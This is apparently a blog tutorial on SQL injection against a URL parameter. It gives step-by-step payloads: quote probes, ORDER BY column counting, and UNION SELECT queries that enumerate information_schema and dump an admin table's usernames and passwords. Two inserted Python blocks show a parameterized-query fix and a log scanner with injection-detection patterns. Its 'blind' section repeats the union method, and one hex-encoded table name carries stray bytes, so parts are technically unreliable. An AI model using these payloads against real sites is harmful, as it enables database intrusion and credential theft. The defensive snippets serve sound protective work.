What You Should Know About SQL Injection

September 17, 2015 | Views: 7370


SQL Injection:

SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).

Types:

[-] Error based

[-] Blind based

 

[1] Error based:

In error-based injection, we use the errors thrown by the database to perform the injection.

 

Let me show an example:

Suppose we have a web app that has a database on the back end and it’s fetching data from it.

Like this website: www.website.com/index.php?id=84

?id=84 means it’s fetching the record with id 84 from the database, and this parameter is our way of communicating with the database.

 

So let’s go forward with these steps…

(1) Finding if it’s vulnerable.

Put a single quote at the end: www.website.com/index.php?id=84'

If you receive an error like “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use.” or something similar, it means that the web app is vulnerable to SQL injection.

What’s so good about getting this error message? The good thing is that the database’s errors reach the page, so we can read them.

 

(2) Joining queries.

Now, to join our own query onto the original one, put --+ at the end like this: www.website.com/index.php?id=84' --+

The -- starts a MySQL comment and the + becomes a space when the URL is decoded, so the rest of the original query is ignored. Our query goes in between the quote and the --+.

 

(3) Find the number of columns.

For this, we use the order by (or group by) clause to find the number of columns. But there are two possibilities: do we have to leave our single quote ( ' ) in here, or do we have to remove it?

How will I know?

Simple…keep the tip below in mind:

Tip:

If the order clause runs “correctly”, meaning the query is parsed but asks for more columns than it has, you’ll see an error like “unknown column '100' in 'order clause'”.

With this, we’ll know whether we have to remove the ( ' ) or not.

Run the order clause with a guess of the maximum number of columns, like this: www.website.com/index.php?id=84' order by 100000000 --+

Do we get an error like this?

“unknown column '100000000' in 'order clause'”

If not, it means that we have to remove our ( ' ) from the link; otherwise it stays.

We’ll keep on guessing the number of columns. Dude, how will I know that I’ve guessed the right number of columns?

Simple.

- if you exceed it, the database gives an error like “unknown column '100' in 'order clause'”

- if you are below it, you’ll see an error like “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use.”

- if you’re on the spot, then there’s no error

 

Suppose:

1- www.website.com/index.php?id=84' order by 100 --+

Error: “unknown column '100' in 'order clause'”

2- www.website.com/index.php?id=84' order by 8--+

Error: “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '”

This means that the number of columns is below 100 and greater than 8.

We try:
3- www.website.com/index.php?id=84' order by 10 --+

No error?? Bingo. This is the number we wanted. We have 10 columns.

 

(4) Finding vulnerable column.

We have to find out through which column we can print information. For that, we use union select. We’ll do a union select of 10 columns like this:
www.website.com/index.php?id=84' union select 1,2,3,4,5,6,7,8,9,10 --+

The vulnerable columns will be printed on the web app (e.g. if 3, 6, 9 are vulnerable, their numbers will be printed on the page. You can use any of them to print data; you can even use all of them.)

If nothing gets printed, the original row for id 84 is still filling the spot where our numbers would be shown. Negate the ID so the original query returns no row and the union’s row is displayed instead: www.website.com/index.php?id=-84' union select 1,2,3,4,5,6,7,8,9,10 --+

Now that we’ve found vulnerable columns, we’ll use them to print info from database.

 

(5) Fetching data

Let’s use vulnerable column 3 to print the database name: www.website.com/index.php?id=84' union select 1,2,database(),4,5,6,7,8,9,10 --+

You can use other functions too, like user() to print the database user and version() to print the version of the database.

Let’s use vulnerable column 6 to print the table names in the database: www.website.com/index.php?id=84' union select 1,2,3,4,5,group_concat(table_name),7,8,9,10 from information_Schema.tables where table_Schema=database()--+

Suppose we got three tables:
admin, users, pages

Let’s use vulnerable column 6 to print the column names from the admin table. For this, we have to convert the table name to hex first, then put it after table_name= (hexed table name here): www.website.com/index.php?id=84' union select 1,2,3,4,5,group_concat(column_name),7,8,9,10 from information_Schema.columns where table_name=0x61646d696e0d0a--+

Suppose we got the following columns:

user, pass

We can print data from them like this: www.website.com/index.php?id=84' union select 1,2,3,4,5,group_concat(user, pass),7,8,9,10 from admin--+
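Why the single quote and the order by probe behave as described above, and why a bound parameter stops both, as an added example that is not part of the original post. It assumes the lookup behind index.php?id= builds its WHERE clause by string concatenation, and uses an in-memory SQLite table standing in for the real back end; the three outcomes (rows, empty, error) are the oracles the walkthrough reads.

```python
import sqlite3

# Constructed sample data standing in for the article's back-end table.
SAMPLE_ROWS = [(84, "About", "Who we are"), (85, "Contact", "Mail us")]


def _make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def fetch_vulnerable(page_id: str) -> str:
    """Concatenates the id parameter into the SQL string, which is how the
    article's index.php?id= endpoint is assumed to be written. Returns the
    database's reaction as one of the three oracles the article reads:
    'rows', 'empty' or 'error'. The article's --+ decodes to '-- ' in
    MySQL; SQLite accepts the bare '--' used in the probes below."""
    conn = _make_db()
    sql = "SELECT id, title, body FROM pages WHERE id='" + page_id + "'"
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.OperationalError:
        return "error"  # stray quote or out-of-range ORDER BY, as in the article
    return "rows" if rows else "empty"


def fetch_parameterized(page_id: str) -> str:
    """Same lookup with a bound parameter. The value is never parsed as SQL,
    so a quote or an appended ORDER BY is just a string that matches no id."""
    conn = _make_db()
    rows = conn.execute(
        "SELECT id, title, body FROM pages WHERE id=?", (page_id,)
    ).fetchall()
    return "rows" if rows else "empty"


if __name__ == "__main__":
    for probe in ("84", "84'", "84' order by 100 --", "84' order by 3 --"):
        print(f"{probe!r:26} concatenated={fetch_vulnerable(probe):6} "
              f"parameterized={fetch_parameterized(probe)}")
```

The concatenated version reproduces the page's error/no-error oracle; the parameterized version answers "empty" to every probe, which is why prepared statements are the fix rather than filtering quotes.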

 

[2] Blind based:

No data is printed on the web app when you put ( ' ) at the end of the URL. So, how can I know that it’s also vulnerable?

Easy.

If you put ( ' ) at the end of the URL and some text, object or picture goes missing from the page, then it’s vulnerable to blind based injection.

 

(1) Finding if it’s vulnerable.

Put a single quote at the end: www.website.com/index.php?id=84'

Did things go missing? This means the web app is vulnerable to blind based SQL injection 🙂

 

(2) Joining queries.

For joining queries, put --+ at the end like this:

www.website.com/index.php?id=84' --+

And in between, we’ll execute our query.

 

(3) Finding the number of columns.

For this, we use the order by (or group by) clause to find the number of columns.

There are two possibilities: do we have to leave our single quote ( ' ) in here, or should we remove it?

Tip: if putting --+ at the end, like this:

www.website.com/index.php?id=84' --+

brings things back to normal, meaning the page returns all its content, then we need the ( ' ); otherwise, remove it.

That’s how we’ll know whether we have to remove the ( ' ) or not.

Run the order clause with a guess of the maximum number of columns. We’ll keep on guessing the number of columns. How will I know that I’ve guessed the right number of columns?

- if you exceed it, the content is missing

- if you’re below it, the content is missing

- if you’re on the spot, then no content is missing 🙂

Let’s take a look…

1- www.website.com/index.php?id=84' order by 100 --+

*Content is missing

This means the number of columns is below 100.

2- www.website.com/index.php?id=84' order by 8--+

*Content is missing

This means that the number of columns is below 100 and greater than 8.

Try:
3- www.website.com/index.php?id=84' order by 10 --+

No content is missing? This is the number we wanted. We have 10 columns.

 

(4) Finding vulnerable columns

We have to find out by which column we can print information.

As above, we use union select: www.website.com/index.php?id=84' union select 1,2,3,4,5,6,7,8,9,10 --+

The vulnerable columns will be printed on the web app (e.g. if 3, 6, 9 are vulnerable, their numbers will be printed on the page. You can use any or all of them.)

 

(5) Fetching data

Let’s use vulnerable column 3 to print the database name:
www.website.com/index.php?id=84' union select 1,2,database(),4,5,6,7,8,9,10 --+

Let’s use column 6 to print the table names in the database: www.website.com/index.php?id=84' union select 1,2,3,4,5,group_concat(table_name),7,8,9,10 from information_Schema.tables where table_Schema=database()--+

If we got three tables:
admin, users, pages

Let’s use column 6 to print the column names from the admin table. We have to convert the table name to hex first, then put it after table_name= (hexed table name here).

www.website.com/index.php?id=84' union select 1,2,3,4,5,group_concat(column_name),7,8,9,10 from information_Schema.columns where table_name=0x61646d696e0d0a--+

Suppose we got the following columns:

user, pass

We can print data from them like this: www.website.com/index.php?id=84' union select 1,2,3,4,5,group_concat(user, pass),7,8,9,10 from admin--+
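The detection side of the same walkthrough, as an added example that is not the article’s code: the probe sequence it describes (a trailing quote, climbing order by values, union select against information_schema) leaves a recognisable trail in the web server’s access log. The log lines are constructed, and the signature names and the order_by_enumeration heuristic are my own.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access log lines (not from the article); the query strings
# mirror the probe sequence the article walks through.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Sep/2015:10:00:01 +0000] "GET /index.php?id=84 HTTP/1.1" 200 5120
10.0.0.7 - - [17/Sep/2015:10:00:02 +0000] "GET /index.php?id=84%27 HTTP/1.1" 500 210
10.0.0.7 - - [17/Sep/2015:10:00:05 +0000] "GET /index.php?id=84%27+order+by+100+--+ HTTP/1.1" 500 230
10.0.0.7 - - [17/Sep/2015:10:00:07 +0000] "GET /index.php?id=84%27+order+by+10+--+ HTTP/1.1" 200 5120
10.0.0.7 - - [17/Sep/2015:10:00:09 +0000] "GET /index.php?id=-84%27+union+select+1,2,3,4,5,group_concat(table_name),7,8,9,10+from+information_schema.tables+where+table_schema=database()--+ HTTP/1.1" 200 4800
10.0.0.9 - - [17/Sep/2015:10:01:00 +0000] "GET /index.php?id=85 HTTP/1.1" 200 5100
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<path>\S+)')

# Signatures for the article's probes, applied to the URL-decoded request path.
SIGNATURES = {
    "quote_probe": re.compile(r"=[^&]*'\s*(--|#|$)"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
}


def scan_access_log(log_text: str) -> dict:
    """Returns {client_ip: sorted signature names}. A client that sends
    several distinct ORDER BY values to one path also gets
    'order_by_enumeration', the column-counting loop described above."""
    hits = defaultdict(set)
    order_by_values = defaultdict(set)
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, decoded = m.group("ip"), unquote_plus(m.group("path"))  # %27 -> ', + -> space
        for name, pattern in SIGNATURES.items():
            if pattern.search(decoded):
                hits[ip].add(name)
        ob = re.search(r"\border\s+by\s+(\d+)", decoded, re.I)
        if ob:
            order_by_values[(ip, decoded.split("?")[0])].add(int(ob.group(1)))
    for (ip, _path), values in order_by_values.items():
        if len(values) >= 2:
            hits[ip].add("order_by_enumeration")
    return {ip: sorted(names) for ip, names in hits.items()}
```

Decoding before matching matters: the raw log carries %27 and + rather than the quote and spaces the signatures look for.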

 

🙂

Cheers

13 Comments
  1. thanks have been struggling for a while with this and it’s helped me a lot, would you use sql map tool or just try to do it without

  2. Entry for beginner level clear explanation 🙂
